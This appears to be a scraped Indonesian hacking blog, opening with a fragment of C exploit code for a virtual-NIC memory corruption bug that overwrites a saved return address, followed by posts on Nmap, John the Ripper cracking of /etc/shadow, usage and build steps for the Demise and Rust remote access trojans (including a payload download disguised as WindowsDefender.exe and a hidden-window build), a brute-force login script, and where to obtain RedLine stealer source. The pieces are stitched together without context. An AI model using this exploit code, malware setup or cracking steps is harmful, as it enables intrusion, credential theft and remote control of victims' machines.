	/* corrupt saved rip */
	tucss = 0;
	mss = htons(POP_RBP & 0xffff) - hdrlen + ipcss; // WHAT_LOW
	paylen = 2 * mss;
	pktlen = paylen + hdrlen;

	tx_cd.upper_setup.tcp_fields.tucss = tucss;
	tx_cd.upper_setup.tcp_fields.tucse = tucss+1;

	tx_cd.cmd_and_length = paylen;
	tx_cd.cmd_and_length |= E1000_TXD_TYP_C;
	tx_cd.cmd_and_length |= E1000_TXD_CMD_IP;

	tx_cd.tcp_seg_setup.fields.status = 0;
	tx_cd.tcp_seg_setup.fields.hdr_len = hdrlen;
	tx_cd.tcp_seg_setup.fields.mss = mss;

	write_off = SAVED_RIP_OFF - ipcss - 2;
	*(uint16_t *)(tx_buffer[head + 1] + tucss) = ~write_off;                 // WHERE
	*(uint16_t *)(tx_buffer[head + 1] + ipcss + 4) = MAKE_WORD(POP_RBP, 1);  // WHAT_HIGH

	e1000_tx_transmit(tx_ring, &head, &tx_cd, pktlen);

	e1000_tx_start(head);


	//xxd(tx_buffer, sizeof(packet));


	return 0;
}

mmu.c

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

uint64_t gva_to_gpa(uint64_t vaddr)
{
	uint64_t paddr = 0;

	int nsys;
	int ret;
	int modid;

	struct module_stat stat;
	stat.version = sizeof(stat);

	modid = modfind("sys/pt");
	if (modid < 0)
		errx(EXIT_FAILURE, "modinfo");

	ret = modstat(modid, &stat);
	if (ret < 0)
		errx(EXIT_FAILURE, "modstat");

	nsys = stat.data.intval;
	ret = syscall(nsys, vaddr, &paddr);

	return paddr;
}

Dasar NMAP

2022-12-28T10:01:00.015-08:00

Nmap adalah salah satu tool scurity yang telah ada sejak dulu, salah satu tools legend yang luarbiasa menurut saya. NMAP ini mirip dengan tools amass. NMAP adalah salah satu tools yang identik dengan peretasan, dan sangat terkenal, tetapi kebanyakan orang tidak tahu bagaimana menggunakan NMAP ini secara maksimal. Pada umumnya hanya menggunakan perintah ini:

$ nmap host

Jika hanya menjalankan perintah ini, Anda bahkan tidak memindai semua port, dan sudah pasti tidak mendapatkan semua informasi yang dapat ditemukan oleh Nmap! Nmap pada dasarnya adalah pemindai port, tetapi fungsinya lebih dari sekadar memberi tahu port mana yang terbuka. Bahkan juga dapat menggunakan Nmap untuk menemukan bugs!

The Basic Scan

Secara default Nmap melakukan pemindaian TCP SYN standar pada 1000 port host teratas.

$ nmap host

At an absolute minimum, I will get more verbosity using -v or -vv.

Minimal absolut, saya akan mendapatkan lebih banyak verbositas menggunakan -v atau -vv.

$ nmap -vv host

Target Specification

Nmap juga bisa menjalankan perintah secara lebih spesifik target dalam banyak format berbeda, termasuk alamat IP, ranges CIDR, dan tanda dash.

$ nmap hostname

$ nmap 123.123.123.123

$ nmap 123.123.123.1/24

$ nmap 123.123.123.1–255

Ping Sweeping

Jika Anda hanya ingin menemukan host mana yang aktif, Anda menggabungkan scan dan ping dengan menambahkan -sn

$ nmap -sn 123.123.123.1/24

Terkadang ada beberapa host yang tidak merespon perintah ping, maka untuk skip ping check dan hanya penggunakan scan host port cukup menambahkan perintah -Pn

$ nmap -Pn host

Scan Targets di sebuah file

Untuk menjalankan perintah ini cukup menambahkan perintah -iL

$ nmap -iL ./hosts.txt

Scan Types

Di mode ini sebenarnya mempunyai 9 tipe, tetapi hanya mempunyai 2 perintah utama yaitu;

TCP SYN (-sS)

UDP (-sU)

Jenis pemindaian default adalah TCP SYN. Untuk scan port UDP gunakan -sU. Jenis pemindaian lainnya dapat berguna untuk firewall tersembunyi tetapi dapat mengorbankan akurasi atau kecepatan. Kita dapat menemukan informasi lebih lanjut tentang berbagai jenis pemindaian nmap di sini https://nmap.org/book/man-port-scanning-techniques.html

Specifying Ports

You can specify which ports to scan with -p. By default, only 1000 ports are scanned. To scan all ports:

Kita dapat menentukan port mana yang akan di scan dengan -p. Secara default, hanya 1000 port yang di scan. Untuk scan seluruh port bosa mengginakan perintah:

$ nmap -p 1–65535 host

Kita juga dapat menentukan daftar yang dipisahkan koma dengan port tunggal, range dan port UDP tertentu:

$ nmap -p 23,23,25,110,80–90,U:53,1000–2000

Version and OS Enumeration

Ketika Nmap menemukan port terbuka, Nmap dapat memeriksa lebih jauh untuk menemukan layanan apa yang sedang dijalankan jika kita menentukan -sV. Kita dapat mengatur seberapa kuat probe yang kita inginkan dari O (probe ight, cepat tapi tidak akurat) hingga 9 (coba semua probe, lambat tapi akurat)

$ nmap -sV — version-intensity 9

Nmap dapat menebak sistem operasi mana yang dijalankan host berdasarkan hasil pemindaian aktifkan fitur ini dengan -O:

$ nmap -O host

Firewall Evasion

Ia juga memiliki fungsi menghindari firewall yang ekstensif. Sejujurnya saya tidak pernah menggunakan fitur ini tetapi fitur ini memungkinkan kita melakukan beberapa hal keren termasuk memalsukan alamat sumber.

Output Formats

Nmap menawarkan banyak output format. Beberapa lebih baik untuk dibaca manusia, yang lain lebih baik untuk diurai ke alat lain. Saya cenderung menampilkan pindaian ke semua format menggunakan.

$ nmap -oA outputfile host

Specific options include:

-oN Normal

-oX XML

-oS scr1pt k1dd13

-oG greppable

Scan Speed

Kita juga dapat menyesuaikan kecepatan pemindaian nmap. menggunakan -T<0-5>. Angka yang lebih tinggi berarti kecepatan yang lebih tinggi.

Kecepatan yang lebih tinggi berarti akurasi yang lebih rendah, dan sebaliknya.

$ nmap -T3 host

Nmap Scripting Engine

This is where Nmap gets really interesting! It can also run Lua scripts. These can do pretty much anything. Nmap comes with about 600 of them that perform various vuln scanning and enumeration tasks, but you can also code your own.

Di sinilah Nmap menjadi sangat menarik! Itu juga dapat menjalankan skrip Lua. Ini dapat melakukan hampir semua hal. Nmap hadir dengan sekitar 600 di antaranya yang melakukan berbagai pemindaian vuln dan scan pencacahan, tetapi kita juga dapat membuat kode sendiri.

Secara default lokasi script LUA ini berada di

<nmap directory>/share/nmap/scripts/*

Bergantung pada penyiapan kita, kita juga dapat membukanya dengan menjalankan

$ locate *.nse

Sebagai contoh penggunaan skrip Nmap, untuk memeriksa apakah sebuah host rentan terhadap Eternal Blue, kita dapat menjalankan:

$ nmap --script=smb-vuln-cve-2017–7494 host

Some scripts require arguments, you can specify them with --script-args=n1=v1,n2=v2 etc.

Beberapa skrip memerlukan argumen, kita dapat menentukannya dengan --script- args=n1=v1,n2=v2 dll.

Untuk mendapatkan bantuan tentang argumen mana yang dapat diterima oleh skrip:

$ nmap --script-help=scriptname

To upgrade your scripts to the latest and greatest, just run:

$ nmap --script-updatedb

A Nice Alias -A

A helpful alias is -A, which will enable OS detection, service version detection, script scanning, and traceroute.

Alias h@pful adalah -A, yang akan mengaktifkan deteksi OS, pemindaian skrip deteksi versi layanan, dan traceroute

nmap -A host

My Go-To Command

Untuk pemindaian menyeluruh dari satu host, perintah masuk yang layak adalah:

$ nmap -A -p1–65535 -v host

A Few Hot Tips

Ini hanyalah tip acak dari komentar tweet asli saya yang tidak sepenuhnya cocok dengan kategori lain tetapi terlalu berguna untuk diabaikan.

Jika pemindaian Anda memakan waktu lama dan Anda ingin lebih bertele-tele, tekan v' saat pemindaian sedang berjalan. Anda dapat meningkatkannya beberapa langkah selama pemindaian. Tidak perlu menghentikan pemindaian untuk menambahkan 'v"!

Convert Nmap XML output ke report friendly HTML gunakan xsltproc.

sltproc <nmap-output.xml> -o <nmap-output.html>

Jika Anda mengeluarkan ke file dengan -oN, -oG atau -oX, Anda dapat menghentikan pemindaian yang sedang berlangsung dan mengambil tepat di mana Anda tinggalkan nanti dengan menggunakan resume <file>

Dasar John The Ripper

2022-12-26T20:52:00.020-08:00

Saya beranggapan bahwa pembaca saya sudah paham apa itu tools John the Ripper, karena saya tidak akan menjelaskan lagi apa itu John the Ripper dan seberapa pentingnya tools ini untuk melakukan tes penetrasi dan dimana anda dapat mendownload tools yang satu ini.

Oke, kita masuk pembahasan yang pertama,

John the Ripper Single Crack Mode

Dalam mode ini John the Ripper memanfaatkan informasi yang tersedia dalam bentuk nama pengguna dan informasi lainnya. Ini bisa digunakan untuk meng-crack file password dengan format

Username:Password

Saya ambil contoh, misalnya username nya adalah "XyberNote", maka password yang akan di coba:

xybernote

XYBERNOTE

xybernote1

x-ybernote

xybernote=

Jadi untuk menggunakan John the Ripper dalam Single Crack Mode kita harus punya bank data yang berisi kumpulan password yang di simpan dalam file crack.txt dimana file ini di enkripsi dalam enkrupsi SHA1. Untuk menjalankan nya bisa menggunakan syntax:

john [mode/option] [password file]
john --single --format=raw-sha1 crack.txt

John the Ripper Wordlist Crack Mode

Dalam mode ini John the ripper menggunakan daftar kata yang juga bisa disebut kamus yang membandingkan hash dari kata-kata yang ada di kamus dengan hash kata sandi. Kita dapat menggunakan daftar kata yang diinginkan. John juga hadir dengan password.lst yang berisi sebagian besar kata sandi umum.

Mari kita lihat bagaimana John the Ripper crack password di Wordlist Crack Mode.

Di sini kita memiliki file teks bernama crack.txt yang berisi nama pengguna dan kata sandi, di mana password tersebut dienkripsi dalam enkripsi SHA1 sehingga untuk menggunakannya bisa menggunakan syntax:

john [wordlist] [options] [password file]
john --wordlist=/usr/share/john/password.lst --format=raw-sha1 crack.txt

Gimana? Paham atau malah bingung dengan penjelasan saya diatas? Hahaha...

Baik, dari pada berbelit-belit mari kita demonstrasikan dua metode di atas, dimana saya akan coba crack dari user Linux. Sebelum itu kita harus mengerti terlebih dahulu apa itu shadow file.

Dalam sistem operasi Linux, file shadow password adalah file sistem tempat password pengguna terenkripsi disimpan. File ini terletak di /etc/shadow.

Metode Pertama

Sekarang, untuk metode pertama, kita akan memecahkan kredensial pengguna "pavan" tertentu.

Dan kita akan menemukan kredensial pavan pengguna dan menyalinnya dan menempelkannya ke file teks.

Sekarang kita akan menggunakan john the ripper untuk memecahkannya.

john crack.txt

Metode Kedua

Sekarang, untuk metode kedua, kita akan bersama-sama memecahkan kredensial untuk semua pengguna.

Untuk melakukan ini, kita harus menggunakan utilitas ripper John yang disebut "unshadow".

unshadow /etc/passwd /etc/shadow > crack.txt

Di sini perintah unshadow menggabungkan file /etc/passwd dan /etc/shadow sehingga John dapat digunakan untuk memecahkannya. Kita menggunakan kedua file tersebut sehingga John dapat menggunakan informasi yang diberikan untuk memecahkan kredensial semua pengguna secara efisien.

Sekarang kita akan menggunakan john untuk memecahkan kredensial pengguna dari semua pengguna secara kolektif.

john --wordlist=/usr/share/john/password.lst crack.txt

Menghentikan dan Memulihkan Cracking

Sementara John the ripper bekerja untuk meretas beberapa kata sandi, kita dapat menghentikan atau menjeda peretasan dan Mengembalikan atau Melanjutkan Peretas lagi sesuai keinginan kami.

Jadi saat John the Ripper sedang berjalan, Anda dapat menginterupsi cracking dengan menekan "q" atau Crtl+C.

Sekarang untuk melanjutkan

atau mengembalikan proses cracking kita akan menggunakan opsi -restore dari John the ripper:

john --restore

Sekarang kami akan mendekripsikan berbagai HASH menggunakan John the Ripper

SHA1

Untuk mendekripsi enkripsi SHA1 kami akan menggunakan RockYou sebagai daftar kata dan memecahkan kata sandi seperti yang ditunjukkan di bawah ini:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha1 crack.txt

MD5

Untuk mendekripsi enkripsi MD5 kita akan menggunakan RockYou sebagai daftar kata dan memecahkan kata sandi seperti yang ditunjukkan di bawah ini:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 rack.txt

MD4

Untuk mendekripsi enkripsi MD4 kita akan menggunakan RockYou sebagai daftar kata dan memecahkan kata sandi seperti yang ditunjukkan di bawah ini:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md4 crack.txt

SHA256

Untuk mendekripsi enkripsi SHA256 kita akan menggunakan RockYou sebagai daftar kata dan memecahkan kata sandi seperti yang ditunjukkan di bawah ini:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha256 crack.txt

RIPEMD128

Untuk mendekripsi enkripsi RIPEMD128 kita akan menggunakan RockYou sebagai daftar kata dan memecahkan kata sandi seperti yang ditunjukkan di bawah ini:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=ripemd-128 crack.txt

Whirlpool

Untuk mendekripsi enkripsi pusaran air kita akan menggunakan RockYou sebagai daftar kata dan memecahkan kata sandi seperti yang ditunjukkan di bawah ini:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=whirlpool crack.txt

View all Format

John the Ripper mendukung banyak enkripsi, beberapa di antaranya kami tunjukkan di atas. Untuk melihat semua format yang didukungnya:

john --list=format

Menyingkat Pilihan

Kita tidak perlu mengetik opsi lengkap setiap kali kita menggunakan john the ripper, Pengembang telah memberi pengguna opsi untuk menyingkat opsi seperti

–single dapat ditulis sebagai -si

–format dapat ditulis sebagai -form

Seperti contoh di bawah ini adalah bagaimana menggunakan singkatan ini.

john -si crack.txt -form=raw-md5

Singkatan lain yang bisa kita gunakan adalah:

–wordlist dapat ditulis sebagai -w

john -w=/usr/share/wordlists/rockyou.txt crack.txt -form=raw-md5

Memecah Banyak File

Kita juga dapat memecahkan banyak file hash jika mereka memiliki enkripsi yang sama. Mari kita ambil contoh, kita memiliki dua file.

crack.txt

md5.txt

Keduanya berisi hash md5, jadi untuk meng-crack kedua file dalam satu sesi, kita akan menjalankan john sebagai berikut:

Sintaks: john [file 1][file 2]

john -form=raw-md5 crack.txt md5.txt

Cukup sekian dulu pembahasan tentang mbah John the Ripper, mudah-mudahan pembahasan ini bisa bermanfaat.

Demise Malware

2022-12-13T07:36:00.022-08:00

Sumber Github

Demise adalah malware Golang yang menggunakan Discord untuk komunikasi.

Commands

show victims connected

$victims

extract a zip file

$unzip <.zip file on drive>

Example:

$unzip DESKTOP-2HJUUK6\Tod main.zip C:\msys64\home\Tod\projects\go\src\github.com\0xSegFaulted\

run Demise on startup

$startup

Example

$startup DESKTOP-2HJUUK6\Tod

run an executable (some executables require admin)

$run

Example

$run DESKTOP-2HJUUK6\Tod file.exe

download file

$dl

Example

$dl DESKTOP-2HJUUK6\Tod http://somesite.com/payload.exe WindowsDefender.exe

run commands

$shell <flags... optional>

Example

$shell DESKTOP-2HJUUK6\Tod whoami

screenshot desktop

$ss

Example

$ss DESKTOP-2HJUUK6\Tod

get IP

$ip

Example

$ip DESKTOP-2HJUUK6\Tod

kill session

$kill
$kill DESKTOP-2HJUUK6\Tod

geolocate

$geoloc
$geoloc DESKTOP-2HJUUK6\Tod

How To

1. Download source code
2. Download golang pilih instalasi yang benar untuk os Anda
3. buat server (ini adalah RAT bot)
4. membuat bot. Saya tidak akan menunjukkan caranya karena ada banyak tutorial di youtube
5. tambahkan bot ke server Anda dan buat saluran teks baru di server Anda
6. salin token bot Anda dan id saluran teks yang baru saja Anda buat

7. letakkan id saluran di sini di awal kode sumber

8. letakkan token bot Anda di sini

9. kompilasi dengan perintah yang mirip dengan ini"go build -ldflags="-s -w -H=windowsgui" ." -H=windowsgui akan menyembunyikan window

jika bot tidak merespons perintah, ubah niat Anda

Rust Remote Access Trojan

2022-12-09T08:51:00.010-08:00

Sumber Github

Repositori ini berisi beberapa folder dengan proyek yang berbeda.

rustrat-client RAT itu sendiri
rustrat-server Server mendengarkan koneksi masuk (belum ditulis)
payload Proyek yang dikompilasi ke WebAssembly untuk eksekusi dan pustaka pembantu untuk pembuatan payload

Membangun instruksi

Jika skema database diubah, database contoh baru perlu dibuat. Pertama kode di rustrat-server untuk menginisialisasi database kosong harus diperbarui, kemudian database contoh baru harus dibuat. Ini dapat dicapai dengan menjalankan perintah berikut:

cargo run --bin update-dbtemplate

cargo sqlx -D sqlite://rustrat-server/dbtemplate.sqlite3?mode=ro prepare --merged

Penggunaan

Komunikasi RAT ke server

cd payloads

cargo build

cd ../rustrat-server

cargo run# Pastikan untuk mencatat kunci publik, buka terminal baru

cargo run --bin rustrat-client-exe rustrat-client-exe rat localhost <public key from rustrat-server>

Kotak pesan akhirnya akan muncul

Jalankan gumpalan wasm

rustrat-client-exe.exe wasm path\to\webassembly.wasm function_name

rundll32 rustrat_client.dll,rundll_run path\to\webassembly.wasm function_name

Perhatikan bahwa fungsionalitas untuk menjalankan WebAssembly yang dikompilasi akan dipindahkan ke peti terpisah untuk tujuan pengembangan/debugging.

Selenium Brute Force Login

2022-12-05T08:19:00.026-08:00

Sumber Github

Skrip default berguna untuk Linkedin, tetapi berfungsi untuk semuanya. Untuk platform lain, perlu mengekstrak id nama pengguna, id kata sandi, dan kelas tombol masuk menggunakan inspektur browser.

Penggunaan.

Untuk mendapatkan daftar opsi dan sakelar dasar gunakan: Skrip default berguna untuk Linkedin, tetapi berfungsi untuk semuanya. Untuk platform lain, perlu mengekstrak id nama pengguna, id kata sandi, dan kelas tombol masuk menggunakan inspektur browser.

Contoh.

Untuk mendapatkan daftar opsi dan sakelar dasar, gunakan:

selenium-brute.py -h

sample:

selenium-brute.py -t https://target.com -u admin -p pass.txt

Analisis dan Source Code RedLine 2020

2022-10-11T11:02:00.003-07:00

Redline Stealer adalah malware yang tersedia di forum bawah tanah untuk dijual. Malware ini mengumpulkan informasi dari browser seperti kredensial yang disimpan, data pelengkapan otomatis, dan informasi kartu kredit. Inventarisasi sistem juga diambil saat dijalankan pada mesin target, untuk menyertakan detail seperti nama pengguna, data lokasi, konfigurasi perangkat keras, dan informasi mengenai perangkat lunak keamanan yang diinstal

Redline telah bocor bertahun-tahun yang lalu dan bahkan retak. Saat ini ada 2 cara untuk mendapatkan source code dari Vx-underground vault dan GitHub

Pada saat sumber ini bocor, analisis menemukan bahwa pencuri sebenarnya mudah dibongkar dan dianalisis. server.exe pada saat itu tidak menjalankan kode dengan benar dan mudah untuk menyembunyikan dan menemukan server C&C dari log. Dan pada saat ini telah banyak versi crack bermunculan dan telah di upgrade.

Cara membelinya pun perlu lebih beragam dan tidak terpaku pada telegram karena tidak semua menggunakan telegram. Red-Line menginspirasi pasar lain untuk membakukan format pelaporan log agar lebih rapi dan mudah digunakan. Ini juga mendukung ekonomi dan pasar akun, membuka lebih banyak pekerjaan di sektor pemrograman, layanan, dan memberikan Peneliti Keamanan dan Perusahaan untuk berpikir lebih serius dan berdedikasi untuk melindungi penggunanya.

Harap diingat bahwa kode sumber ini atau exe yang mungkin berisikan atau menyembunyikan malware. Jalankan dengan sangat hati-hati menggunakan lab mesin virtual.

Analisis lengkap oleh Blue team faction